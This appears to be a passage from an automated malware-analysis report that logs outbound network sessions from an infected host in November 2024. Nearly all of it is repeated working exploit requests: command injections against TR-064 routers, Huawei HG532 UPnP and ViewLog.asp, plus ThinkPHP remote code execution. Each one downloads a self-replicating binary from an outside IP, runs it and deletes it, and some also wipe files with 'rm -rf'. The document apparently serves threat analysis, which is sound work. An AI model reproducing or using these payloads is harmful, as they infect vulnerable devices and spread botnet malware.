                                          <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`rm -rf *;cd /tmp;wget http://198.12.107.126/YourName/BinName.mips; chmod 777 BinName.mips; ./BinName.mips TR-064.Selfrep; rm -rf BinName.mips`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                          Data Raw:
                                          Data Ascii:


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          76192.168.2.1356010179.27.189.1737547
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:58:02.814553022 CET801OUTPOST /UD/act?1 HTTP/1.1
                                          Host: 127.0.0.1:7547
                                          User-Agent: Messiah/2.0
                                          SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                          Content-Type: text/xml
                                          Content-Length: 526
                                          <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`rm -rf *;cd /tmp;wget http://198.12.107.126/YourName/BinName.mips; chmod 777 BinName.mips; ./BinName.mips TR-064.Selfrep; rm -rf BinName.mips`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                          Data Raw:
                                          Data Ascii:


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          77192.168.2.1356106179.27.189.1737547
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:58:02.820247889 CET801OUTPOST /UD/act?1 HTTP/1.1
                                          Host: 127.0.0.1:7547
                                          User-Agent: Messiah/2.0
                                          SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                          Content-Type: text/xml
                                          Content-Length: 526
                                          <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`rm -rf *;cd /tmp;wget http://198.12.107.126/YourName/BinName.mips; chmod 777 BinName.mips; ./BinName.mips TR-064.Selfrep; rm -rf BinName.mips`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                          Data Raw:
                                          Data Ascii:


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          78192.168.2.1354432178.0.75.680
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:58:03.488687992 CET466OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                          Host: 127.0.0.1
                                          Connection: keep-alive
                                          Accept-Encoding: gzip, deflate
                                          Accept: */*
                                          User-Agent: MtmKilledYou
                                          Content-Length: 176
                                          Content-Type: application/x-www-form-urlencoded
                                          Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 39 38 2e 31 32 2e 31 30 37 2e 31 32 36 2f 59 6f 75 72 4e 61 6d 65 2f 42 69 6e 4e 61 6d 65 2e 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 42 69 6e 4e 61 6d 65 2e 61 72 6d 37 3b 2e 2f 42 69 6e 4e 61 6d 65 2e 61 72 6d 37 3b 72 6d 2b 2d 72 66 2b 42 69 6e 4e 61 6d 65 2e 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                          Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://198.12.107.126/YourName/BinName.arm7;chmod+777+BinName.arm7;./BinName.arm7;rm+-rf+BinName.arm7%3b%23&remoteSubmit=Save


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          79192.168.2.1354834197.231.115.9237215
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:58:03.510375023 CET844OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Content-Length: 430
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 38 2e 31 32 2e 31 30 37 2e 31 32 36 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 59 6f 75 72 4e 61 6d 65 2f 42 69 6e 4e 61 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 198.12.107.126 -l /tmp/bigH -r /YourName/BinName.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          80192.168.2.1350636197.35.120.6837215
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:58:03.511745930 CET844OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Content-Length: 430
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 38 2e 31 32 2e 31 30 37 2e 31 32 36 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 59 6f 75 72 4e 61 6d 65 2f 42 69 6e 4e 61 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 198.12.107.126 -l /tmp/bigH -r /YourName/BinName.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          81192.168.2.1333400197.82.132.16537215
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:58:03.513185024 CET844OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Content-Length: 430
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 38 2e 31 32 2e 31 30 37 2e 31 32 36 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 59 6f 75 72 4e 61 6d 65 2f 42 69 6e 4e 61 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 198.12.107.126 -l /tmp/bigH -r /YourName/BinName.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          82192.168.2.1352628197.1.17.21137215
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:58:03.514470100 CET844OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Content-Length: 430
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 38 2e 31 32 2e 31 30 37 2e 31 32 36 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 59 6f 75 72 4e 61 6d 65 2f 42 69 6e 4e 61 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 198.12.107.126 -l /tmp/bigH -r /YourName/BinName.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          83192.168.2.1340760197.214.151.637215
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:58:03.515836954 CET844OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Content-Length: 430
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 38 2e 31 32 2e 31 30 37 2e 31 32 36 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 59 6f 75 72 4e 61 6d 65 2f 42 69 6e 4e 61 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 198.12.107.126 -l /tmp/bigH -r /YourName/BinName.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          84192.168.2.1346328157.192.14.12237215
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:58:03.517239094 CET844OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Content-Length: 430
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 38 2e 31 32 2e 31 30 37 2e 31 32 36 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 59 6f 75 72 4e 61 6d 65 2f 42 69 6e 4e 61 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 198.12.107.126 -l /tmp/bigH -r /YourName/BinName.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          85192.168.2.135409895.199.55.20280
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:58:03.588702917 CET340OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1
                                          Connection: keep-alive
                                          Accept-Encoding: gzip, deflate
                                          Accept: /
                                          User-Agent: Tsunami/2.0


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          86192.168.2.135909895.62.22.4380
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:58:03.590728998 CET340OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1
                                          Connection: keep-alive
                                          Accept-Encoding: gzip, deflate
                                          Accept: /
                                          User-Agent: Tsunami/2.0


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          87192.168.2.1339882199.58.155.757547
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:58:03.710325956 CET801OUTPOST /UD/act?1 HTTP/1.1
                                          Host: 127.0.0.1:7547
                                          User-Agent: Messiah/2.0
                                          SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                          Content-Type: text/xml
                                          Content-Length: 526
                                          <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`rm -rf *;cd /tmp;wget http://198.12.107.126/YourName/BinName.mips; chmod 777 BinName.mips; ./BinName.mips TR-064.Selfrep; rm -rf BinName.mips`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                          Data Raw:
                                          Data Ascii:


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          88192.168.2.134070461.64.58.1617547
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:58:03.743856907 CET801OUTPOST /UD/act?1 HTTP/1.1
                                          Host: 127.0.0.1:7547
                                          User-Agent: Messiah/2.0
                                          SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                          Content-Type: text/xml
                                          Content-Length: 526
                                          <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`rm -rf *;cd /tmp;wget http://198.12.107.126/YourName/BinName.mips; chmod 777 BinName.mips; ./BinName.mips TR-064.Selfrep; rm -rf BinName.mips`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                          Data Raw:
                                          Data Ascii:


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          89192.168.2.134041497.18.162.2007547
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:58:03.821448088 CET801OUTPOST /UD/act?1 HTTP/1.1
                                          Host: 127.0.0.1:7547
                                          User-Agent: Messiah/2.0
                                          SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                          Content-Type: text/xml
                                          Content-Length: 526
                                          <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`rm -rf *;cd /tmp;wget http://198.12.107.126/YourName/BinName.mips; chmod 777 BinName.mips; ./BinName.mips TR-064.Selfrep; rm -rf BinName.mips`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                          Data Raw:
                                          Data Ascii:


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          90192.168.2.1338306168.211.82.507547
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:58:03.821475983 CET801OUTPOST /UD/act?1 HTTP/1.1
                                          Host: 127.0.0.1:7547
                                          User-Agent: Messiah/2.0
                                          SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                          Content-Type: text/xml
                                          Content-Length: 526
                                          <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`rm -rf *;cd /tmp;wget http://198.12.107.126/YourName/BinName.mips; chmod 777 BinName.mips; ./BinName.mips TR-064.Selfrep; rm -rf BinName.mips`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                          Data Raw:
                                          Data Ascii:


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          91192.168.2.1351364157.4.219.1147547
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:58:03.821484089 CET801OUTPOST /UD/act?1 HTTP/1.1
                                          Host: 127.0.0.1:7547
                                          User-Agent: Messiah/2.0
                                          SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                          Content-Type: text/xml
                                          Content-Length: 526
                                          <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`rm -rf *;cd /tmp;wget http://198.12.107.126/YourName/BinName.mips; chmod 777 BinName.mips; ./BinName.mips TR-064.Selfrep; rm -rf BinName.mips`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                          Data Raw:
                                          Data Ascii:


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          92192.168.2.135430674.194.189.2037547
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:58:03.887433052 CET801OUTPOST /UD/act?1 HTTP/1.1
                                          Host: 127.0.0.1:7547
                                          User-Agent: Messiah/2.0
                                          SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                          Content-Type: text/xml
                                          Content-Length: 526
